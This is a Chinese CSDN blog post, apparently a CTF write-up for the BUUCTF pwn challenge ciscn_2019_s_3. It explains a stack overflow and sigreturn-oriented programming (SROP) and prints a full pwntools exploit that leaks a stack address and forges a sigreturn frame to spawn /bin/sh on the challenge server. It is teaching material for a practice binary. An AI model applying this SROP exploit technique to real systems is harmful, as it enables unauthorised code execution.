ciscn_2019_s_3(SROP)

最新推荐文章于 2023-06-07 15:51:39 发布
最新推荐文章于 2023-06-07 15:51:39 发布
阅读量283 收藏 1
点赞数 3
文章标签: linux python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62322730/article/details/130219412
版权
文章介绍了如何利用ida分析程序中的栈溢出漏洞,通过sys_rt_sigreturn系统调用和构造SigreturnFrame来执行SROP攻击,最终达到执行/bin/sh的目的。作者首先确定了溢出长度和返回地址,然后动态调试获取/bin/sh的地址,最后构建payload实现控制流程。
摘要由CSDN通过智能技术生成

0x01 分析

ida分析:

vuln:

 

 read存在栈溢出,读入的地方是rsp-10,写入10个字节之后可以直接覆盖到return。0x19-0x0F=10。

 gadgets:

这里需要注意两个地方:mov rax,15 和 mov rax,59。这里涉及到Linux系统调用:

15对应的是sys_rt_sigreturn系统调用;

59对应的是sys_execve系统调用

所以这道题目可以有两种办法来做。

  • 第一种办法是依靠59对应的execve,然后想办法执行execve(“/bin/sh”,0,0)

  • 第二种办法是依靠15对应的sys_rt_sigreturn,借助sigreturn frame来执行execve(“/bin/sh”,0,0)

 我采用第二种方法。

0x02 溢出

gdb动态调试

第一次不要溢出刚好覆盖到返回地址就好,距离binsh位置还未知。

0x00007fffffffdec8 - 0x7fffffffddb0 = 0x118,这个偏移是固定的,那么我们可以通过write函数打印出这个地址,然后减去这个偏移,就能得到/bin/sh的地址

可以将binsh保存在栈中,知道binsh的地址。然后调用SROP,将rax=59,rbx=syscall,rdi=binsh

from pwn import *
context.arch='amd64'
p=remote('node4.buuoj.cn',28790)
#p=process("./ciscn_s_3")
elf=ELF('./ciscn_s_3')

gadget=0x4004DA
syscall=0x400517
vuln=0x4004ED
p.send('a'*0x10+p64(vuln))

binsh=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x118

0x03 SROP

SROP(Sigreturn Oriented Programming),Sigreturn是一个系统调用,它在unix系统发生signal的时候会被间接地调用。

Signal机制在线代操作系统中被使用的非常广泛,例如:1、内核要kill一个进程;2、为进程设置定时器;3、通知进程一些异常事件。

SROP原理

1、内核向某进程发起一个signal,该进程被暂时挂起,进入内核;

2、内核保存该进程的上下文(ucontext save);

3、跳转到signal handler中处理相应的signal;

4、内核恢复之前保存的上下文(ucontext restore);

5、恢复进程执行。

linux下,内核会帮用户进程将其上下文保存在该进程的栈上,然后在栈填地址rt_sigreturn,这个地址指向一段代码,调用sigreturn系统调用。

当signal handler执行完之后,ESP/RSP就会指向rt_sigreturn,这样signal handler函数的最后一条指令ret会使得执行流跳转到这段sigreturn代码,执行sigreturn系统调用。

思路:在栈上放好上下文(sigreturn frame),自己调用sigreturn,跳过步骤1、2,通过步骤3、4让内核把我们伪造的上下文恢复到用户进程。实现控制通用寄存器、rip、栈劫持。

Iinux i386下调用sigreturn的代码在vdso中;linux x86_64下我们一般通过调用15号syscall来调用sigreturn。

pwntools中已经集成了对SROP的攻击方法。

frame=SigreturnFrame()
frame.rax=59
frame.rdi=binsh
frame.rip=syscall
frame.rsi=0
payload="/bin/sh\x00"*2+p64(gadget)+p64(syscall)+str(frame)
p.send(payload)

0x04 完整EXP

from pwn import *
context.arch='amd64'
p=remote('node4.buuoj.cn',28790)
#p=process("./ciscn_s_3")
elf=ELF('./ciscn_s_3')

gadget=0x4004DA
syscall=0x400517
vuln=0x4004ED
p.send('a'*0x10+p64(vuln))

binsh=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x118

frame=SigreturnFrame()
frame.rax=59
frame.rdi=binsh
frame.rip=syscall
frame.rsi=0
payload="/bin/sh\x00"*2+p64(gadget)+p64(syscall)+str(frame)
p.send(payload)

p.interactive()

0x05 写在最后

参考链接:

http://liul14n.top/2020/03/07/Ciscn-2019-s-3/

【星盟安全】PWN全集,从入门到精通,最通俗易懂的CTF,持续更新中_哔哩哔哩_bilibili

萌新的第一篇博客,有任何错误请指正~

surya……
关注
【pwn】ciscn_2019_s_3
Nothing
12-14 4588
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
ciscn_2019_s_3
m0_52231248的博客
11-16 1235
ciscn_2019_s_3 Checksec: Ida: 看到代码量很少,同时出现了syscall基本上这题就是srop了。 接下来确定溢出,offest=0x10 srop :伪造 sigreturn frame 去 伪造 execve("/bin/sh",0,0) 来 getshell 我们已经确定了offest还需要完成 1,需要知道栈的地址(比如需要知道自己构造的字符串`/bin/sh`的地址); 2,需要知道`syscall`指令在内存中的地址; 3,需要知
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 376
64位,开启了NX保护 main函数调用了vuln
pwn ciscn_2019_s_3
beaster1的博客
03-23 206
pwn ciscn_2019_s_3(srop) checksec一下发现是64位文件 并只开了NX保护 打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10) 发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp,rsp 程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了 所以r
BUUCTF pwn ciscn_2019_s_3(SROP)
菜的只能随便写写博客
02-13 1573
0x01 文件分析   0x02 运行  有一个回显,并且还有多余的字符显示,接着看代码分析一下。   0x03 IDA源码  由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。  在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用是execve,利用这两个可以执行系统调用得到shell。  ex...
buuctf:ciscn_s_3题解
xia0ji233
05-27 711
title: 系统调用的学习 date: 2021-05-25 22:00:00 tags: binary security study report syscall comments: true categories: ctf pwn today新的知识又增长了,发现了getshell的另一种方式:syscall和srop。故事还要源于…(此处省略万字输出) (note:本作者这次有点懒,没有写AT&T汇编,而是一律用了intel汇编,请悉知) 可能是之前汇编基础不太好吧,竟没有发现sy.
SROP 学习笔记
Assassin
05-14 926
文章目录一、基本介绍二、signal 机制三、攻击原理四、SROP chain的构造五、关于利用六、例题讲解 本文只是学习的记录文章,主要是以CTF wiki为主,然后加上例题讲解。 一、基本介绍 SROP(Sigreturn Oriented Programming) 于 2014 年被 Vrije Universiteit Amsterdam 的 Erik Bosman 提出,其相关研究Framing Signals — A Return to Portable Shellcode发表在安全顶级会议
syscall指令_ctf中关于syscall系统调用的简单分析
weixin_36190812的博客
12-28 378
原创 紫色仰望 合天智汇0x01我在动态调试这个程序的时候,发现 syscall调用 系统函数 的过程很有趣,于是便记录下来 希望对大家 能带来些帮助,这里 以 buu 平台上的 ciscn_2019_s_3 为例,给大家详细地分享以及分析下!0x02在开始之前,我们先来认真 学习下 read(),write()的 原型:read():ssize_t read(int fd,const void...
萌新学pwn之SROP
qq_36495104的博客
05-22 886
这篇文章主要是讲解对ctf-wiki上面的SROP的例子的理解,题目是360ctf的一个题目 代码很简单 .text:00000000004000B0 public start .text:00000000004000B0 start proc near ; DATA XREF: LOAD:0000000000400018↑o .text:00000000004000B0 xor rax,
buuctf ciscn_2019_s_3
carol2358的博客
04-20 1384
这题对还是萌新的我来说有点难,用的SROP 在这里插入图片描述
csicn_2019_s_3
Morphy_Amo的博客
03-06 361
万能gadget、SROP
[BUUCTF-pwn]——ciscn_2019_s_3
Y_peak的博客
02-13 361
[BUUCTF-pwn]——ciscn_2019_s_3 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_3 peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存
2019ciscn_s_3
最新发布
Hyrink的博客
06-07 524
ciscn_s_3的两种解法:SROP & ret2csu详解
【BUUCTF - PWN】ciscn_2019_s_3
古月浪子的博客
04-17 760
checksec一下,栈溢出 IDA打开看看,main函数内只有一个call vuln 注意到vuln函数末尾并没有使用leave指令,即直接把之前push的rbp当作return address 我们要ROP的话offset只需要0x10 程序里还给了一些gadget,注意到当rax=0x3b时syscall为execve,只需要让rdi="/bin/sh"、rsi=0、rdx=0即可ge...
ciscn_2019_s_3(系统调用综合)
weixin_61283545的博客
06-11 745
打开函数只有read和write。发现gadget函数,这道题重要关键在于系统调用号。发现gadget rax赋值为59,调用execve,ida H键变10进制,调用execve需要$rax==59$rdi==“/bin/sh”$rsi==0$rdx==0syscall这时候就需要用到libc_csu辅助,ropper里面可以找到pop rdi,/bin/sh\x00我们可以直接通过read写入栈中,其他的利用gadget进行填充。 注意的是read后面没有leave不用填充。还有一点在执行csu_e
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 532
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
srop的基本原理是什么
03-03
SROP(Sigreturn-Oriented Programming)是一种利用信号处理函数(signal handler)来执行攻击代码的技术。攻击者通过利用程序中的漏洞,将程序状态中的寄存器值篡改成指向一个虚假的信号处理函数,并且在这个虚假的信号处理函数中构造恶意代码,然后通过返回从而控制程序流程。 SROP 原理的基本思想是,通过修改程序中的寄存器值,让程序跳转到一个虚假的信号处理函数,这个信号处理函数会执行攻击者构造的恶意代码,从而实现攻击目的。具体来说,攻击者在恶意代码中利用 syscall 指令实现系统调用,以获取 root 权限或者执行其他恶意操作。 总之,SROP 技术是一种高级的攻击技术,可以绕过现有的安全防护机制,因此需要注意防范。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值